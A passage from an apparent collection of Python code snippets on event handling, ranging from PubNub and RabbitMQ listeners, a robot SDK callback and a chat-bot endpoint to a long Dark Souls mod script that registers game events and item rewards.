react_to_event(self):\n raise NotImplementedError()", "def init_events_transmitter():\n class StatusListener(SubscribeCallback):\n def status(self, pubnub, status):\n event = \"unknown\"\n\n if status.operation == PNOperationType.PNSubscribeOperation \\\n and status.category == PNStatusCategory.PNConnectedCategory:\n event = \"Connect\"\n elif status.operation == PNOperationType.PNUnsubscribeOperation \\\n and status.category == PNStatusCategory.PNAcknowledgmentCategory:\n event = \"Unsubscribe\"\n\n asyncio.ensure_future(pubnub.publish().channel('status-' + APP_KEY).message({\n \"event\": event\n }).future(), loop=loop)\n\n def presence(self, pubnub, presence):\n pass\n\n def message(self, pubnub, message):\n pass\n\n listener = StatusListener()\n pubnub.add_listener(listener)", "def events_and_callbacks_qi_framework():\n\n # ALMemory acts as the hub for the distribution of event notifications.\n # Source: https://developer.softbankrobotics.com/nao6/naoqi-developer-guide/naoqi-apis/naoqi-core/almemory\n # Example: https://developer.softbankrobotics.com/nao6/naoqi-developer-guide/other-tutorials/python-sdk-tutorials/python-sdk-examples/vision/face\n\n # Create a broker\n # TODO(TK): why?\n naoqi.ALBroker(\"pythonBroker\", IP_ME, PORT_ME, IP_ROBOT, PORT_ROBOT)\n\n proxy_memory = naoqi.ALProxy(\"ALMemory\", IP_ROBOT, PORT_ROBOT)\n\n # Register callback:\n def mycallback(key, value):\n print(\"qi callback: key={}, value={}\".format(key, value))\n sess = proxy_memory.session()\n mem = sess.service(\"ALMemory\")\n sub = mem.subscriber(\"FaceDetected\")\n sub.signal.connect(functools.partial(mycallback, \"FaceDetected\"))\n\n # Raise an event:\n proxy_memory.raiseEvent(\"FaceDetected\", str(datetime.datetime.now()))\n proxy_memory.raiseEvent(\"AnotherEvent\", str(datetime.datetime.now()))\n time.sleep(0.1) # give it some time to process", "async def event_handler(self, response):\n data = ujson.loads(response.data)\n if isinstance(data, dict):\n if data['event'] == 'subscribed':\n print('Subscribed to channel: {0}, for pair: {1}, on channel ID: {2}'.format(data['channel'], data['pair'], data['chanId']))\n self.channel_mapping[data['chanId']] = (data['channel'], data['pair'])\n elif data['event'] == 'info':\n print('Exchange: {0} Websocket version: {1}'.format(self.id, data['version']))\n elif isinstance(data, list):\n if isinstance(data[1], str):\n print('Heartbeat on channel {0}'.format(data[0]))\n else:\n # Published data, time stamp and send to appropriate queue\n timestamp = self.microseconds() / 1000\n datetime = self.iso8601(timestamp)\n if self.channel_mapping[data[0]][0] == 'book':\n pair_id = self.channel_mapping[data[0]][1]\n await self.queues['orderbooks'][pair_id].put((data, timestamp, datetime))", "def __call__(self, event, payload):\n logging.debug(\"Event: %s %s\" % (event, payload))\n\n # register new task\n if event == \"CRAB_Cmd_Mgr:NewTask\":\n self.newTaskRegistration(payload)\n elif event == \"KillTask\":\n taskUniqName, cmdRng = payload.split(':')\n self.killingRequestes[taskUniqName] = cmdRng\n # usual stuff\n elif event == \"TaskRegisterComponent:StartDebug\":\n logging.getLogger().setLevel(logging.DEBUG)\n elif event == \"TaskRegisterComponent:EndDebug\":\n logging.getLogger().setLevel(logging.INFO)\n elif event == \"TaskRegisterComponent:HeartBeat\":\n logging.info(\"HeartBeat: I'm alive \")\n self.ms.publish(\"TaskRegisterComponent:HeartBeat\",\"\",self.HeartBeatDelay)\n self.ms.commit()\n else:\n logging.info('Unknown message received %s + %s'%(event,payload))\n return True", "def test_listen_for_registers_listener(self):\n bus = event_bus._event_bus\n\n def event_listener(_):\n pass\n\n with event_bus.listen_for(Event, event_listener):\n self.assertEqual(len(bus._registration_id_map), 1)", "def handle_events(self, events):\n for event in events:\n event_type = event['type']\n if event_type == types.SO_CHANGE:\n for key in event['data']:\n self.data[key] = event['data'][key]\n self.on_change(key)\n\n elif event_type == types.SO_REMOVE:\n key = event['data']\n assert key in self.data, (key, self.data.keys())\n del self.data[key]\n self.on_delete(key)\n\n elif event_type == types.SO_SEND_MESSAGE:\n self.on_message(event['data'])\n else:\n assert False, event", "def _publish(self,e):\n # translate here....\n ev = self.__enum_event_map[int(e)]\n print ev\n # publish here....\n self.__qf.publish(event.Event(ev))\n print \"complete\"", "def event0():\n header(0, 0)\n end_if_client()\n\n if DEBUG.GET_MASTER_KEY:\n flag.disable(50004066)\n item.award_item_to_host_only(4073)\n if DEBUG.HAS_RUSTBONE:\n flag.enable(EVENT.HasBonerust)\n if DEBUG.SPEED_UP_PLAYER:\n chr.set_special_effect(CHR.Player, 2370)\n if DEBUG.GET_CHTHONIC_SPARK:\n flag.disable(50001510) # Thrall Spark drop flag.\n item.award_item_to_host_only(ITEMLOT.ThrallReward)\n\n for flag_id in (760, 762, 765):\n flag.disable(flag_id)\n\n # Display a message after an event flag is enabled (with optional delay).\n run_event_with_slot(260, 0, args=(11810000, 10010600, 0), arg_types='iif') # Arrival in Lordran.\n run_event_with_slot(260, 1, args=(257, 10010610, 0), arg_types='iif') # Rite of Kindling.\n run_event_with_slot(260, 2, args=(EVENT.ObtainedChthonicSpark, 10010620, 0), arg_types='iif') # Chthonic Spark.\n run_event_with_slot(260, 3, args=(11412053, 10010621, 0), arg_types='iif') # Chthonic Spark stolen.\n run_event_with_slot(260, 4, args=(EVENT.LordvesselReceived, TEXT.LordvesselWarpUnlocked, 0), arg_types='iif')\n\n # Assorted events (see documentation). Mostly monitoring states. 710 monitors warping ability.\n for event_id in (761, 763, 290, 701, 702, 717, 718,\n 706, 740, 750, 752, 757, 758, 759,\n 754, 770, 772, 730, 731, 766, 710):\n run_event(event_id)\n\n # Monitor Lord Souls/Shard possession. Doesn't include Dark Remnant.\n run_event_with_slot(711, 0, args=(2500, 711)) # Gravelord Nito\n run_event_with_slot(711, 1, args=(2501, 712)) # Bed of Chaos\n run_event_with_slot(711, 2, args=(2502, 713)) # Four Kings\n run_event_with_slot(711, 3, args=(2503, 714)) # Seath the Scaleless\n\n run_event(715) # Player has Gwyn's Soul.\n run_event(716) # Player has Sunlight Spear.\n run_event(11512000) # (New) Player has been given Lordvessel.\n\n # Monitor Estus upgrade level.\n for slot, args in enumerate(zip(range(202, 215, 2), range(203, 216, 2))):\n run_event_with_slot(8131, slot, args)\n\n run_event(819) # Monitor repair box sync.\n\n run_event(2540) # (New) Ring of the Embraced punishes you if removed.\n run_event(2541) # (New) Ring of Temptation activates after 15 seconds.\n run_event(2542) # (New) Ring of Temptation takes your souls and breaks if you die.\n run_event(2543) # (New) Ring of the Evil Eye kill reward.\n run_event(2544) # (New) Twilight Ring effect starts and ends.\n run_event(2545) # (New) Twilight Ring effect waxes and wanes.\n run_event(2546) # (New) Bond to Beyond has a 5% chance of giving one soft humanity.\n run_event(2547) # (New) Contract and heal Bonerust (11302050)\n run_event(2548) # (New) Kills heal with Nahr Alma pact.\n run_event(2549) # (New) Ring of Condemnation recharges.\n run_event(11502020) # (New) Lithic Witness event.\n run_event(11502023) # (New) Beyond Witness event.\n\n # (New) Toggles availability of full bonfire menu based on Spark possession.\n run_event(11512005)\n\n # BOSS DROPS\n\n for slot, args in enumerate((\n # boss_dead_flag, immediate_item_lot, delayed_item_lot_1, delayed_item_lot_2\n (2, ITEMLOT.AriamisReward, 9020, 9030),\n (11010901, ITEMLOT.TaurusDemonReward, 9000, 9030),\n (11010904, ITEMLOT.ProfaneImageReward, 0, 0),\n (3, ITEMLOT.BellGargoylesReward, 9020, 0),\n (4, ITEMLOT.CrossbreedPriscillaReward, 9020, 0),\n (11200900, ITEMLOT.MoonlightButterflyReward, 9000, 0),\n (11200901, ITEMLOT.GravestalkersReward, 9030, 0),\n (5, ITEMLOT.AbyssArtoriasReward, 9000, 0),\n (6, ITEMLOT.PinwheelReward, 9000, 9030),\n (7, ITEMLOT.NitoReward, 9000, 9030),\n (9, ITEMLOT.QuelaagReward, 9020, 0),\n (11410902, ITEMLOT.CeaselessDischargeReward, 9000, 9030),\n (11412055, ITEMLOT.JeremiahReward, 9000, 0),\n (11410901, ITEMLOT.CentipedeDemonReward, 9000, 9030),\n (10, ITEMLOT.BedOfChaosReward, 9000, 9030),\n (11, ITEMLOT.SensGolemReward, 9000, 0),\n (11510900, ITEMLOT.GwyndolinReward, 0, 0),\n (11510901, ITEMLOT.JareelReward, 0, 0),\n (11510902, ITEMLOT.OrnsteinReward, 9000, 0),\n (11510903, ITEMLOT.SmoughReward, 9000, 0),\n (11012012, ITEMLOT.ThrallReward, 0, 0),\n (13, ITEMLOT.FourKingsReward, 9010, 0),\n (14, ITEMLOT.SeathReward, 9000, 0),\n (11800001, ITEMLOT.GwynCinderReward, 0, 0),\n (16, ITEMLOT.AsylumDemonReward, 9000, 0),\n (11810901, ITEMLOT.StrayDemonReward, 9000, 9030),\n (11810902, ITEMLOT.AsylumTyrantReward, 9000, 9030),\n (11210000, ITEMLOT.SanctuaryGuardianReward, 9000, 0),\n (11210001, ITEMLOT.ArtoriasReward, 0, 0),\n (11212006, ITEMLOT.ManusReward, 9040, 0),\n (11210004, ITEMLOT.KalameetReward, 0, 0),\n (11212008, ITEMLOT.TwilightVagrantReward, 0, 0),\n (11512201, ITEMLOT.GwynLightReward, 0, 0),\n )):\n run_event_with_slot(1950, slot, args)\n\n # (New) Monitor Velka's pact. (1910 is enabled in Firelink Shrine.)\n run_event(1915) # Monitor pact breaking.\n run_event(1916) # Monitor Seath punishment.\n run_event(1917) # Monitor Nito punishment.\n run_event(1918) # Monitor Jeremiah punishment.\n\n # (New) Monitor challenge pacts.\n run_event(1900) # Kremmel.\n run_event(1901) # Zandroe.\n run_event(1902) # Caitha.\n run_event(1903) # Nahr Alma.\n run_event(1904) # Quella permanent Abyss warp.\n run_event(1905) # Monitor Etched Ring removal and curse player (non-Quella).\n run_event(1906) # Quella ring removal.\n\n run_event(1920) # (New) Return Xanthous Crown on next load when dropped. Uses 1921.\n run_event(1922) # (New) Warp to special Painted World event when Soul of Ariamis is consumed.\n run_event(1923) # (New) Award Chaos Fire Whip when Soul of the Exile is consumed.\n run_event(1924) # (New) Skeletons in Tomb go back to rest when you load a map other than Tomb or Catacombs.\n run_event(1925) # (New) Manages Dark Ember damage boost stacks.\n run_event(11025400) # (New) Manages Ruinous Hand kill charge-up.\n run_event(1926) # (New) Trigger Ruinous Hand explosion at full charge.\n run_event(1927) # (New) HP penalty for being hollow (25%).\n\n run_event(2510) # (New) Sable Rune control.\n run_event(2511) # (New) Lustrous Rune control.\n run_event(2512) # (New) Wraith Rune control.\n run_event(2513) # (New) Scintilla Rune control.\n run_event(2514) # (New) Omphalic Rune control.\n run_event(2515) # (New) Omphalic Rune kill counter and death trigger.\n run_event(2516) # (New) Pale White Rune control.\n run_event(2517) # (New) Reaper's Rune trigger.\n run_event(2518) # (New) Reaper's Rune kill counter.\n run_event(2519) # (New) Rhythm Rune triggers.\n run_event(2520) # (New) Ransackers Rune trigger.\n # (New) Ransackers Rune item map checks. (2521-2530) (No Kiln, no Asylum.)\n for slot, (block, area) in enumerate(((10, 0), (10, 1), (10, 2), (11, 0), (12, 0), (12, 1),\n (13, 0), (13, 1), (13, 2), (14, 0), (14, 1), (15, 0),\n (15, 1), (16, 0), (17, 0))):\n args = tuple([block, area] + [50000 + 100 * slot + 10 * i for i in range(0, 10)])\n run_event_with_slot(2521, slot, args=args, arg_types='BBiiiiiiiiii')\n \n # Activate Runes.\n for slot, rune in enumerate(range(9)):\n run_event_with_slot(2600, slot, args=(90 + rune, 11025350 + rune))\n\n # Monitor availability of bonfire options\n for slot, args in enumerate(zip(range(2600, 2610), range(250, 260))):\n run_event_with_slot(250, slot, args)\n\n # Remove Embers from inventory when given to blacksmiths. These are removed aggressively and repeatedly!\n for slot_args in zip((0, 1, 2, 6, 7, 8, 9, 10, 12),\n zip((350, 351, 352, 356, 357, 358, 359, 360, 362),\n (800, 801, 802, 806, 807, 808, 809, 810, 812))):\n run_event_with_slot(350, slot_args[0], slot_args[1])\n\n # (NEW) Chthonic Spark version of the above event, which also requires Vamos to be alive.\n run_event_with_slot(363, 0, args=(363, 813))\n\n # Monitor reinforcement material possession.\n for slot, args in enumerate(zip(range(1000, 1131, 10), range(780, 794))):\n run_event_with_slot(780, slot, args)\n\n # Monitor covenant membership.\n for slot, args in enumerate(zip(range(0, 10), range(850, 860))):\n run_event_with_slot(870, slot, args)\n\n # Covenant joining events. (args = trigger_flag, player_animation, rotation_target, looping_animation)\n for slot, args in enumerate(zip(range(840, 850), (7905, 7905, 7905, 7905, 7898, 7905, 7905, 7913, 7905, 7905),\n (6370, 6072, 6080, 6001, 10000, 6340, 6341, 10000, 6380, 1400700),\n (-1, -1, -1, -1, 7896, -1, -1, 7911, -1, -1))):\n run_event_with_slot(840, slot, args)\n\n # Monitor NG+ level. Uses flags 690 (NG) to 705 (NG+15).\n run_event_with_slot(690, 0, args=(600, 4, 16, 1175))\n\n run_event(719) # Monitor possession of any spell.\n run_event(720) # Monitor possession of any pyromancy.\n\n # Monitor whether shops are sold out.\n # NOTE: This all suggests that shopkeeper flags are in the 7000 range for their area. Avoid!\n run_event(721) # Big Hat Logan in Duke's Archives.\n run_event(722) # Quelana of Izalith.\n run_event(723) # Griggs at Firelink Shrine.\n run_event(724) # Male Undead Merchant. (I don't think this does anything.)\n run_event(725) # Checks if you've bought 2+ items from Logan in Duke's Archives.\n run_event(726) # Checks if you've bought 2+ items from Ingward in New Londo Ruins.\n run_event(727) # Checks flags in Ash Lake / Great Hollow. Not sure who this is.\n\n run_event(745) # Cut Shiva questline I think.\n run_event(818) # Black Eye Orb quivers in Anor Londo.\n run_event(810) # Monitor possession of Lautrec's Black Eye Orb.\n # Lautrec frees himself from New Londo if both item flags below are enabled.\n run_event_with_slot(812, 0, args=(51400150,)) # Monitor possession of Blighttown Fire Keeper Soul (moved).\n run_event_with_slot(812, 1, args=(51010050,)) # Monitor possession of Undead Parish Humanity (still on altar).\n run_event(822) # Disable flag 830 half a second after leaving the Kiln. (Frampt pickup.)\n run_event(823) # Disable flag 831 half a second after leaving the Kiln. (Kaathe pickup.)\n\n # (New) Monitor dead NPCs for Twilight Vagrant. Counts friendly or hollow death, unless noted otherwise.\n for slot, npc_dead_flag in enumerate((\n 1073, # 2051: Oscar (friendly) (must be enabled in tutorial)\n 1097, # 2052: Big Hat Logan\n 1115, # 2053: Griggs\n 1005, # 2054: Solaire (note this won't trigger if he is killed when Hollow, unlike other NPCs)\n 1254, # 2055: Laurentius\n 1462, # 2056: Crestfallen Warrior\n 1575, # 2057: Lautrec\n 1604, # 2058: Shiva\n 1628, # 2059: Patches\n 1899, # 2060: Havel\n 1864, # 2061: Ciaran (in Oolacile and/or with Nito)\n 1823, # 2062: Hawkeye Gough\n 5, # 2063: Artorias (in Darkroot)\n )):\n run_event_with_slot(11212050, slot + 1, args=(npc_dead_flag,))\n\n # (New) Monitor Tomb of the Giants presence to send Giant Skeletons back to sleep.\n run_event(11310201)\n\n # (New) Monitor picking up Chthonic Spark for the first time to display message.\n run_event(11512004)\n\n # EVENT REWARDS (covenants, storylines)\n\n run_event_with_slot(910, 0, args=(11400591, 1280)) # Joining Chaos Servants.\n run_event_with_slot(911, 0, args=(11010591, 1000, 1), arg_types='iiB')\n run_event_with_slot(911, 1, args=(11510590, 1010, 1), arg_types='iiB')\n run_event_with_slot(911, 2, args=(11700591, 1020, 1), arg_types='iiB')\n run_event_with_slot(911, 3, args=(11000591, 1030, 1), arg_types='iiB')\n run_event_with_slot(911, 4, args=(11400590, 1040, 1), arg_types='iiB')\n run_event_with_slot(911, 5, args=(11410594, 1050, 1), arg_types='iiB')\n run_event_with_slot(911, 6, args=(11020594, 1060, 1), arg_types='iiB')\n run_event_with_slot(911, 7, args=(11020595, 1070, 1), arg_types='iiB')\n run_event_with_slot(911, 8, args=(11810590, 1082, 1), arg_types='iiB')\n run_event_with_slot(911, 9, args=(11810591, 1080, 1), arg_types='iiB')\n run_event_with_slot(911, 10, args=(11510592, 1090, 1), arg_types='iiB')\n run_event_with_slot(911, 11, args=(11600592, 1100, 1), arg_types='iiB')\n run_event_with_slot(911, 12, args=(11020602, 1110, 1), arg_types='iiB')\n run_event_with_slot(911, 13, args=(11010594, 1120, 1), arg_types='iiB')\n run_event_with_slot(911, 14, args=(11010595, 1130, 1), arg_types='iiB')\n run_event_with_slot(911, 15, args=(11020599, 1140, 1), arg_types='iiB')\n run_event_with_slot(911, 16, args=(11020607, 1150, 1), arg_types='iiB')\n run_event_with_slot(911, 17, args=(11200592, 1160, 1), arg_types='iiB')\n run_event_with_slot(911, 18, args=(11200593, 1170, 1), arg_types='iiB')\n run_event_with_slot(911, 19, args=(11200594, 1180, 1), arg_types='iiB')\n run_event_with_slot(911, 20, args=(11300590, 1190, 1), arg_types='iiB')\n run_event_with_slot(911, 21, args=(11300591, 1200, 1), arg_types='iiB')\n run_event_with_slot(911, 22, args=(11310590, 1210, 1), arg_types='iiB')\n run_event_with_slot(911, 23, args=(11310592, 1220, 1), arg_types='iiB')\n run_event_with_slot(911, 24, args=(11310593, 1230, 1), arg_types='iiB')\n run_event_with_slot(911, 25, args=(11310594, 1240, 1), arg_types='iiB')\n run_event_with_slot(911, 26, args=(11320590, 1250, 1), arg_types='iiB')\n run_event_with_slot(911, 27, args=(11320581, 1260, 1), arg_types='iiB')\n run_event_with_slot(911, 28, args=(11320593, 1270, 1), arg_types='iiB')\n run_event_with_slot(911, 29, args=(11400592, 1290, 1), arg_types='iiB')\n run_event_with_slot(911, 30, args=(11400594, 1300, 1), arg_types='iiB')\n run_event_with_slot(911, 31, args=(11400596, 1310, 1), arg_types='iiB')\n run_event_with_slot(911, 32, args=(11400597, 1320, 1), arg_types='iiB')\n run_event_with_slot(911, 33, args=(11400598, 1330, 1), arg_types='iiB')\n run_event_with_slot(911, 34, args=(11400599, 1340, 1), arg_types='iiB')\n run_event_with_slot(911, 35, args=(11510595, 1350, 1), arg_types='iiB')\n run_event_with_slot(911, 36, args=(11510596, 1360, 1), arg_types='iiB')\n run_event_with_slot(911, 37, args=(11510597, 1370, 1), arg_types='iiB')\n run_event_with_slot(911, 38, args=(11600594, 1380, 1), arg_types='iiB')\n run_event_with_slot(911, 39, args=(11600595, 1390, 1), arg_types='iiB')\n run_event_with_slot(911, 40, args=(11600596, 1400, 1), arg_types='iiB')\n run_event_with_slot(911, 41, args=(11010598, 1410, 0), arg_types='iiB')\n run_event_with_slot(911, 42, args=(11210590, 1500, 1), arg_types='iiB')\n run_event_with_slot(911, 43, args=(11210593, 1510, 1), arg_types='iiB')\n run_event_with_slot(911, 44, args=(11210594, 1520, 1), arg_types='iiB')\n run_event_with_slot(911, 45, args=(11600580, 1401, 1), arg_types='iiB')\n run_event_with_slot(911, 46, args=(11600581, 1402, 1), arg_types='iiB')\n run_event_with_slot(911, 47, args=(11600582, 1403, 1), arg_types='iiB')\n run_event_with_slot(911, 48, args=(11600583, 1404, 1), arg_types='iiB')\n run_event_with_slot(890, 0, args=(11310580, 1221, 1), arg_types='iiB') # 911 ran out of slots (up against 960).\n run_event_with_slot(890, 1, args=(11510580, 1361, 1), arg_types='iiB')\n run_event_with_slot(890, 2, args=(11510581, 1371, 1), arg_types='iiB')\n run_event_with_slot(890, 3, args=(11320592, 1261, 1), arg_types='iiB')\n\n # DIRECT NPC DEATH REWARDS (960-969)\n run_event_with_slot(960, 0, args=(1315, 6180, 1100)) # Ingward (Key to the Seal)\n run_event_with_slot(960, 1, args=(1402, 6230, 6230)) # Undead Merchant (Orange Soapstone)\n # run_event_with_slot(960, 2, args=(1198, 6080, 1140)) # Petrus (Lift Chamber Key) (dies before killing Rhea)\n # run_event_with_slot(960, 3, args=(1196, 6080, 1140)) # Petrus (Lift Chamber Key) (dies after killing Rhea)\n\n # NEW GAME PLUS: Bring covenant ranks up to date, and prevent gifts from being re-awarded.\n run_event_with_slot(8200, 0, args=(3, 5500, 50000120, 11010594))\n run_event_with_slot(8200, 1, args=(3, 5510, 50000130, 11010595))\n run_event_with_slot(8200, 2, args=(2, 103, 50000160, 11200592))\n run_event_with_slot(8200, 3, args=(3, 240, 50000170, 11200593))\n run_event_with_slot(8200, 4, args=(2, 124, 50000180, 11200594))\n run_event_with_slot(8200, 5, args=(0, 453000, 50000220, 11310592))\n run_event_with_slot(8200, 6, args=(3, 5100, 50000225, 11310580))\n run_event_with_slot(8200, 7, args=(3, 5110, 50000230, 11310593))\n run_event_with_slot(8200, 8, args=(3, 114, 50000265, 11320581))\n run_event_with_slot(8200, 9, args=(3, 377, 50000260, 11320592))\n run_event_with_slot(8200, 10, args=(3, 378, 50000270, 11320593))\n run_event_with_slot(8200, 11, args=(3, 4500, 50000310, 11400596))\n run_event_with_slot(8200, 12, args=(3, 4520, 50000320, 11400597))\n run_event_with_slot(8200, 13, args=(3, 4510, 50000330, 11400598))\n run_event_with_slot(8200, 14, args=(2, 130, 50000350, 11510595))\n run_event_with_slot(8200, 15, args=(3, 113, 50000360, 11510596))\n run_event_with_slot(8200, 16, args=(2, 102, 50000365, 11510580))\n run_event_with_slot(8200, 17, args=(3, 5910, 50000370, 11510597))\n run_event_with_slot(8200, 18, args=(0, 1366000, 50000375, 11510581))\n run_event_with_slot(8200, 19, args=(0, 904000, 50000380, 11600594))\n run_event_with_slot(8200, 20, args=(3, 102, 50000390, 11600595))\n run_event_with_slot(8200, 21, args=(0, 210000, 50000400, 11600596))\n run_event_with_slot(8200, 22, args=(1, 40000, 50000410, 11600580))\n run_event_with_slot(8200, 23, args=(1, 41000, 50000420, 11600581))\n run_event_with_slot(8200, 24, args=(1, 42000, 50000430, 11600582))\n run_event_with_slot(8200, 25, args=(1, 43000, 50000440, 11600583))\n\n # Same as above, but for other special rewards.\n run_event_with_slot(8300, 0, args=(ItemType.good, 100, 50000000)) # White Sign Soapstone\n run_event_with_slot(8300, 1, args=(ItemType.good, 101, 51100330)) # Red Sign Soapstone\n run_event_with_slot(8300, 2, args=(ItemType.good, 102, 50000390)) # Red Eye Orb\n run_event_with_slot(8300, 3, args=(ItemType.good, 106, 11017020)) # Orange Guidance Soapstone\n run_event_with_slot(8300, 4, args=(ItemType.good, 108, 11607020)) # Book of the Guilty\n run_event_with_slot(8300, 5, args=(ItemType.good, 112, 11407080)) # Servant Roster\n run_event_with_slot(8300, 6, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n run_event_with_slot(8300, 7, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n run_event_with_slot(8300, 8, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n run_event_with_slot(8300, 9, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n\n # NOTE: Flag 8310 onwards is used for NPC humanity registration.\n\n # Same as above for DLC items.\n run_event_with_slot(8090, 0, args=(ItemType.good, 510, 11217010))\n run_event_with_slot(8090, 1, args=(ItemType.good, 511, 11217020))\n run_event_with_slot(8090, 2, args=(ItemType.good, 512, 11217030))\n run_event_with_slot(8090, 3, args=(ItemType.good, 513, 11217040))\n run_event_with_slot(8090, 4, args=(ItemType.good, 514, 11217050))\n\n # (New) Same as above, but for Runes and other new items.\n run_event_with_slot(11022100, 0, args=(ItemType.good, 900, 51010020))\n run_event_with_slot(11022100, 1, args=(ItemType.good, 901, 51510690))\n run_event_with_slot(11022100, 2, args=(ItemType.good, 902, 51200120))\n run_event_with_slot(11022100, 3, args=(ItemType.good, 903, 51410030))\n run_event_with_slot(11022100, 4, args=(ItemType.good, 904, 51810080))\n run_event_with_slot(11022100, 5, args=(ItemType.good, 905, 51700020))\n run_event_with_slot(11022100, 6, args=(ItemType.good, 906, 51300220))\n run_event_with_slot(11022100, 7, args=(ItemType.good, 907, 51300221))\n run_event_with_slot(11022100, 8, args=(ItemType.good, 908, 51210290))\n run_event_with_slot(11022100, 9, args=(ItemType.ring, 133, 50000650)) # Velka gift (Ring of Condemnation)\n run_event_with_slot(11022100, 10, args=(ItemType.ring, 124, 50001780)) # Twilight Vagrant drop (Twilight Ring)\n run_event_with_slot(11022100, 11, args=(ItemType.ring, 105, 50004900)) # Lithic Bond\n run_event_with_slot(11022100, 12, args=(ItemType.ring, 107, 50004910)) # Serous Bond\n run_event_with_slot(11022100, 13, args=(ItemType.ring, 106, 50004920)) # Empyrean Bond\n run_event_with_slot(11022100, 14, args=(ItemType.ring, 108, 50004930)) # Bond to Beyond\n # Leaving slots 11022100-11022119 dedicated to this.\n\n # (NEW) Remove some additional new items in NG+.\n run_event_with_slot(11022120, 0, args=(ItemType.ring, 152)) # Ashen Ring\n run_event_with_slot(11022120, 1, args=(ItemType.ring, 151)) # Gwynevere's Ring\n run_event_with_slot(11022120, 2, args=(ItemType.good, 220)) # Silver Pendant\n run_event_with_slot(11022120, 3, args=(ItemType.armor, 294000)) # Xanthous Crown (true)\n run_event_with_slot(11022120, 4, args=(ItemType.ring, 149)) # Darkmoon Seance Ring", "def run(self, event, db):\n pass", "def on_event():\n\n event = request.get_json()\n \n token_status, token_text = validate_token()\n\n if token_status != 0:\n return json.jsonify({'text': token_text})\n\n if event['type'] == 'ADDED_TO_SPACE' and event['space']['type'] == 'ROOM':\n text = 'Thanks for adding me to \"%s\"! For help type @bot help' % event['space']['displayName']\n \n elif event['type'] == 'MESSAGE':\n\n room_name = event['space']['name'].split('/')[1]\n commands = ['list', 'add', 'remove', 'help']\n\n try:\n param = event['message']['text'].split()[1:][0]\n except:\n text = _help()\n return json.jsonify({'text': text})\n\n if param in commands:\n\n if param == 'list':\n text = _list(room_name)\n\n elif param == 'add':\n text = _add(event, room_name)\n\n elif param == 'remove':\n text = _remove(event, room_name)\n\n elif param == 'help':\n text = _help()\n return json.jsonify({'text': text})\n \n else:\n text = send_msg(event, room_name)\n\n else:\n return\n \n return json.jsonify({'text': text})", "def get_events(self):\n raise NotImplementedError", "def get_events(self):\n raise NotImplementedError", "def outReadEvent(self, readBuffer):\r\n pass", "def send_event(event: dict):\n\n eventbridge.put_events(Entries=[event])", "def handle_event(self, event):\n raise NotImplementedError(\n \"handle_event() is not implemented for base class.\")", "def test_process_packet_event(self):\n pkt = {'type': 'event',\n 'name': 'woot',\n 'endpoint': '',\n 'args': []}\n self.ns.process_packet(pkt)\n assert not self.environ['socketio'].error.called\n\n # processing an event packet with message id and ack\n pkt = {'type': 'event',\n 'id': 1,\n 'ack': 'data',\n 'name': 'tobi',\n 'endpoint': '',\n 'args': []}\n self.ns.process_packet(pkt)\n assert not self.environ['socketio'].error.called", "def customEvent(self, e):\n data = e.data()\n \n ## HOST INFO\n \n if data.find('host up') == 0:\n self.emit(PYSIGNAL('host_up'), (data.split(' ')[2],))\n\n elif data.find('host down') == 0:\n self.emit(PYSIGNAL('host_down'), (data.split(' ')[2],))\n\n elif data.find('add group') == 0:\n self.emit(PYSIGNAL('add_group'), (int(data.split(' ')[2]),))\n\n elif data.find('remove group') == 0:\n self.emit(PYSIGNAL('remove_group'), (int(data.split(' ')[2]),))\n\n elif data.find('group beat') == 0:\n self.emit(PYSIGNAL('group_beat'), (data[11:],))\n \n ## PKAUDIOD\n \n elif data.find('midi') == 0:\n l = data.split(' ')[1:]\n data = [int(l[0]),int(l[1]),int(l[2]),float(l[3])]\n self.emit(PYSIGNAL('midi'), (data,))\n \n elif data.find('sample:starting') == 0:\n l = data.split(' ')\n self.emit(PYSIGNAL('local_sample_starting'), (int(l[1]),))", "async def createEvent(self, event: Event) -> None:", "def receive(channel):\n\n def callback(ch, method, properties, body):\n\n event = json.loads(body)\n event_info = event['event_info']\n event_type = event['type']\n success = True\n logger.info(f\"Received event {event}\")\n\n try:\n # Events coming from account microservice\n\n if event_type == USER_CREATED_EVENT:\n\n add_and_publish_event(\n GlobalPreferencesCreatedEvent(event['uuid'], event_info['id'], dict(\n vehicles=['bus', 'subway', 'train', 'tram', 'car', 'walking', 'bike', 'taxi',\n 'enjoy', 'mobike'],\n personal_vehicles=[])),\n PREFERENCES_CREATED)\n\n elif event_type == USER_DELETED_EVENT:\n\n add_and_publish_event(GlobalPreferencesDeletedEvent(event['uuid'], event_info['id']), PREFERENCES_DELETED)\n\n # Events generated in this microservice\n\n elif event_type == PREFERENCES_CREATED_EVENT:\n add_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == PREFERENCES_MODIFIED_EVENT:\n modify_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == PREFERENCES_DELETED_EVENT:\n delete_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == CALENDAR_CREATED_EVENT:\n add_calendar(Calendar(**event_info))\n\n elif event_type == CALENDAR_MODIFIED_EVENT:\n modify_calendar(Calendar(**event_info))\n\n elif event_type == CALENDAR_DELETED_EVENT:\n delete_calendar(Calendar(**event_info))\n\n except SQLAlchemyError as e:\n\n # to deal with at least once delivery of rabbitmq and the create methods which are not idempotent\n if (event_type == USER_CREATED_EVENT or event_type == PREFERENCES_CREATED_EVENT or event_type == CALENDAR_CREATED_EVENT) \\\n and method.redelivered and isinstance(e, IntegrityError):\n logger.info(f'Not processed redelivered event {event}')\n\n else:\n logger.info(f\"Couldn't process event {event}\")\n success = False\n\n finally:\n if success: # ack only if the event has been processed\n ch.basic_ack(delivery_tag=method.delivery_tag)\n logger.info(f\"Processed and acked event {event}\")\n\n # channel.basic_qos(prefetch_count=1)\n channel.basic_consume(callback,\n queue=CALENDAR_QUEUE)\n\n logger.info(\"Started listening to events\")\n channel.start_consuming()", "def event(self, event: object):\n\n self._event = event", "def event(self, event):\n\n self._event = event", "def event(self, event):\n\n self._event = event", "def event(self, event):\n\n self._event = event", "def events(bot, event, *args):\n yield from _printEventList(bot, event)", "def __call__(self, trigger, type, event):", "def on_eod(self, oid, body):\n\t\tself._pbar.update(self._pbar.total - self._pbar.n)\n\t\tself._pbar.close()\n\n\t\tself.basic_publish('dereg-feed', sender=self.id)\n\t\tself.basic_publish('dereg-exe', sender=self.id)\n\n\t\tself._stop()" ]
